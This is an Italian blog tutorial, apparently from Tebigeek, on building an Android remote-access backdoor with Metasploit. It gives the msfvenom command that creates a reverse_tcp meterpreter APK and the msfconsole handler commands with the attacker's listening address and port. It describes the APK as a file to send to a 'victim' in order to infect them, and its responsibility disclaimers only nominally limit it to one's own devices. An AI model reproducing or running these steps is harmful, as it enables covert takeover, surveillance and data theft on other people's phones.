Come creare una BackDoor per Android con Linux

Ricordiamo ai lettori che le nostre guide sono solo a scopi informativi e l’autore e/o Tebigeek NON si assumono responsabilità di eventuali danni.

0
934

Come creare una BackDoor
per Android con Linux

Oggi andremo a vedere come creare una BackDoor per Android con Linux in pochi e semplici passi.

Come creare una BackDoor per Android con LinuxMolte persone per controllare un dispositivo Android da remoto usa il noto Tool “AndroRat”. Ma siccome a noi di Tebigeek non piace la la “Pappa pronta” andremo a vedere come crearci il nostro RAT con qualsiasi distribuzione Linux!

Questa guida ricordiamo che è solo a scopo illustrativo per testare i vostri dispositivi e non per infettare altri. Tebigeek non si assume nessuna responsabilità dell’uso che ne farete.

Requisiti:

Una distribuzione Linux (BackBox, Kali, Parrot ecc…)
Framework Metasploit (Già presente nelle distribuzioni Linux dedicate ai Pen Test, come Kali Linux)
Un dispositivo Android

In questa guida userò BackBox.

Step 1: Creare il Payload!

Apriamo il terminale su BackBox
Utilizziamo Metasploit per creare l’exploit

msfvenom -p  android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1604 R >
 /home/the_boss_/Scrivania/Hack.apk

Screen 1

Una volta eseguito il comando avremo un file Hack.apk da inviare alla vittima per infettarla.

Step 2: Impostazioni Connessione

Adesso bisogna predisporre la nostra macchina ad una connessione di tipo reverse_tcp con questi comandi:

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

A questo punto inseriamo i parametri associati al nostro scenario, con questi comandi in fila:

set lhost 192.168.1.6 –> Indirizzo IP dell'attaccante
set lport 1604 –> porta su cui ascoltare per connessione in entrata (assicurarsi
che la porta sia aperta)
exploit –> Avviamo l'ascolto in attesa di connessioni in entrata

Screen 2

 

 

 

 

Quando installeremo l’APK sul dispositivo nel terminale vedremo la connessione in ascolto.

 

Arrivati a questo punto siete riusciti ad infettare la vostra vittima, vi consiglio di provare solo in locale su dispositivi di vostra proprietà per evitare eventuali problemi, anche perchè io e Tebigeek non ci assumiamo nessuna responsabilità come vi ho già detto all’inizio.

Facebook Comments

NESSUN COMMENTO

LASCIA UN COMMENTO